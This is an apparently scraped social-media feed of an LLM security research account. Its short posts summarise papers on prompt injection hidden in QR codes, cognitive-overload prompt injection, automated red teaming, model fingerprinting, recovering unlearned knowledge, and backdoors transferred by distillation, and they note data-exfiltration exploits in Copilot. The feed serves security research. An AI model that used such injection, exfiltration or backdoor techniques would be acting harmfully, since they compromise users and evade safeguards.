llm_sec Profile Banner
LLM Security Profile
LLM Security

@llm_sec

Followers
10K
Following
650
Media
252
Statuses
825

Research, papers, jobs, and news on large language model security. Got something relevant? DM / tag @llm_sec

🏔️
Joined April 2023
Don't wanna be here? Send us removal request.
@llm_sec
LLM Security
1 year
@elder_plinius attack surface ∝ capabilities.
0
1
15
@llm_sec
LLM Security
3 months
RT @LeonDerczynski: Call for papers: LLMSEC 2025. Deadline 15 April, held w/ ACL 2025 in Vienna. Formats: long/short/war stories. More: >>….
0
4
0
@llm_sec
LLM Security
8 months
Gritty Pixy. "We leverage the sensitivity of existing QR code readers and stretch them to their detection limit. This is not difficult to craft very elaborated prompts and to inject them into QR codes. What is difficult is to make them inconspicuous as we do here with Gritty
Tweet media one
1
3
27
@llm_sec
LLM Security
8 months
RT @garak_llm: garak has moved to NVIDIA!. New repo link:
0
39
0
@llm_sec
LLM Security
8 months
ChatTL;DR – You Really Ought to Check What the LLM Said on Your Behalf 🌶️. "assuming that in the near term it’s just not machines talking to machines all the way down, how do we get people to check the output of LLMs before they copy and paste it to friends, colleagues, course
Tweet media one
Tweet media two
0
1
11
@llm_sec
LLM Security
8 months
Automated Red Teaming with GOAT: the Generative Offensive Agent Tester. "we introduce the Generative Offensive Agent Tester (GOAT), an automated agentic red teaming system that simulates plain language adversarial conversations while leveraging multiple adversarial prompting.
0
4
35
@llm_sec
LLM Security
8 months
LLMmap: Fingerprinting For Large Language Models. "With as few as 8 interactions, LLMmap can accurately identify 42 different LLM versions with over 95% accuracy. More importantly, LLMmap is designed to be robust across different application layers, allowing it to identify LLM
Tweet media one
0
26
95
@llm_sec
LLM Security
8 months
RT @llm_sec: Insights and Current Gaps in Open-Source LLM Vulnerability Scanners: A Comparative Analysis 🌶️. "Our study evaluates prominent….
0
11
0
@llm_sec
LLM Security
8 months
author thread for cognitive overload attack:
@upadhayay_bibek
Bibek
9 months
1. 🔍What do humans and LLMs have in common?. They both struggle with cognitive overload! 🤯 .In our latest study, we dive deep into In-Context Learning (ICL) and uncover surprising parallels between human cognition and LLM behavior. @aminkarbasi @vbehzadan.2. 🧠 Cognitive Load
Tweet media one
0
0
3
@llm_sec
LLM Security
8 months
Cognitive Overload Attack: Prompt Injection for Long Context. "We applied the principles of Cognitive Load Theory in LLMs. We show that advanced models such as GPT-4, Claude-3.5 Sonnet, Claude-3 OPUS, Llama-3-70B-Instruct, Gemini-1.0-Pro, and Gemini-1.5-Pro can be successfully
Tweet media one
1
9
35
@llm_sec
LLM Security
8 months
InjecGuard: Benchmarking and Mitigating Over-defense in Prompt Injection Guardrail Models. (-- look at that perf/latency pareto frontier. game on!). "State-of-the-art models suffer from over-defense issues, with accuracy dropping close to random guessing levels (60%). We propose
Tweet media one
Tweet media two
2
5
35
@llm_sec
LLM Security
8 months
AgentHarm: A Benchmark for Measuring Harmfulness of LLM Agents. "To facilitate research on LLM agent misuse, we propose a new benchmark called AgentHarm. We find (1) leading LLMs are surprisingly compliant with malicious agent requests without jailbreaking, (2) simple universal
Tweet media one
4
26
82
@llm_sec
LLM Security
8 months
Does your LLM truly unlearn? An embarrassingly simple approach to recover unlearned knowledge. "This paper reveals that applying quantization to models that have undergone unlearning can restore the "forgotten" information."."for unlearning methods with utility constraints, the
Tweet media one
3
36
169
@llm_sec
LLM Security
8 months
RT @NannaInie: unpopular opinion: maybe let insecure be insecure and worry about the downstream effects on end users instead of protecting….
0
2
0
@llm_sec
LLM Security
8 months
RT @_Sizhe_Chen_: Safety comes first to deploying LLMs in applications like agents. For richer opportunities of LLMs, we mitigate prompt in….
0
13
0
@llm_sec
LLM Security
8 months
Insights and Current Gaps in Open-Source LLM Vulnerability Scanners: A Comparative Analysis 🌶️. "Our study evaluates prominent scanners - Garak, Giskard, PyRIT, and CyberSecEval - that adapt red-teaming practices to expose these vulnerabilities. We detail the distinctive features
Tweet media one
1
11
51
@llm_sec
LLM Security
10 months
RT @mbrg0: the go-to method for data exfil after a successful prompt injection is rendering an image or a clickable link. that's why m365 c….
0
27
0
@llm_sec
LLM Security
11 months
RT @wunderwuzzi23: 🔥 Microsoft fixed a high severity data exfiltration exploit chain in Copilot that I reported earlier this year. It was….
0
74
0
@llm_sec
LLM Security
11 months
Tenable Research discovered a vulnerability in Microsoft’s Copilot Studio via a server-side request forgery (SSRF), which allowed access to potentially sensitive information regarding service internals with potential cross-tenant impact.
0
0
11
@llm_sec
LLM Security
11 months
Transferring Backdoors between Large Language Models by Knowledge Distillation. "we propose ATBA, an adaptive transferable backdoor attack, which can effectively distill the backdoor of teacher LLMs into small models when only executing clean-tuning". "we exploit a shadow model
Tweet media one
1
4
30